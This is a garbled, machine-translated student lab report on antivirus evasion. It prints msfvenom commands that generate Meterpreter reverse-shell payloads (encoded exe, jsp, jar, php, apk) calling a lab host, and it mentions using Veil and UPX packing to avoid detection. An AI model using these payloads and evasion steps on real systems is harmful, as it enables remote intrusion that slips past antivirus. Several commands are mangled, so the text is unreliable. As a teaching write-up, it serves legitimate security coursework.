2019-2020-2 20,175,301 Lee Kum Ran "against network technology" Exp3 free to kill Principles and Practice

2019-2020-2 20,175,301 Lee Kum Ran "against network technology" Exp3 free to kill Principles and Practice #

table of Contents

1. target practice

(1L) a Task: Use proper msf encoder, msfvenom generates other files, such as a jar or the like, veil-evasion, their use to kill Free shellcode programming skills or tools
(2) two tasks: through application of various combinations of technology malicious Code to avoid killing
(3) task three: measured using another computer, in the case of soft kill on, and run back to even succeed, kill the soft version marked with the name of the computer

2. Basics

2.1 principle free to kill

Free to kill technique called the anti-virus technology Anti Anti- Virus referred to as "free kill", it refers to a way for the Trojan virus from killing antivirus software technology. Due to avoid killing technology covered a very wide scope, which includes disassembly, reverse engineering, hacking techniques and other system vulnerabilities, it is very difficult. Its contents are basically modified viruses, Trojan signatures to change the content, thus avoid the killing anti-virus software.
If you want to do a good job to avoid killing, it must clearly anti-virus software (malware detection tool) is how it works. AV (Anti-virus) is a big industry.

3. Experimental Procedure

3.11. Proper use msf encoder

First look at the last experiment generated files compiled only once the results of

killing results from VirusTotal website
to enter the code
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.198.128 LPORT=5301 -f exe > encoded10.exe
generation compiler behind the program 10 times

demonstrated several different multi-compiler will not have more, will still be killed soft killing , especially my tinder killing several times.

Jsp files generated 3.2.msfvenom

Use msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301jsp.jspgenerate jsp files

tinder not detected

3.3msfvenom generated jar file

Use msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301jar.jargenerated jar file

tinder has not detected

3.4msfvenom generate php files

Use msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301php.phpgenerate php file

tinder still no response

3.5msfvenom generated apk (Andrews) file

Use msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 x> 20175301apk.apkgenerated apk file

looks like tinder really useless

3.6 Use veil-evasion generation backdoor

Download the veil of the process is really twists and turns, I see a lot of different blog found last win is the lack of documents
and can not be used sudo apt-get install winto install the
final use of the method https://www.cnblogs.com/20175317zrw/p/12504140.html in
fact when he was still playing this character, the installation is very slow very slow


and finally proved the effect hidden veil of little better than useless

3.7 using a packer UPX

See tinder killing him I was confident nothing

3.8 By combining the application of various techniques to achieve malicious code to avoid killing

There is a known method is the use of other loads veil, can be reached in VirusTotal 0 query rate

method from blog https://www.cnblogs.com/20175317zrw/p/12504140.html

3.9 Measured with another computer, in the case of soft kill on, and run back to even succeed, kill the soft version marked with the name of the computer

Just packers can

4. Problems experiment

The main problem is serious in the installation veil, I have done quite behind and like to refer to someone else's blog, the basic problems in the experiment are so resolved. I believe the previous step out of the way innovation can take a convenient way for people behind.

5. questions answered

How to 1) kill soft is detected malicious code?
According to signatures, virus database search, one vip detection (observe behavioral characteristics)
2) What to do to avoid killing
anti- kill soft
3) basic methods to avoid killing what?
Change signature, do not reference other people's virus (the virus do not Curry), to change the behavior characteristics
4) open soft kill can absolutely prevent malicious computer code?
No, I just did it.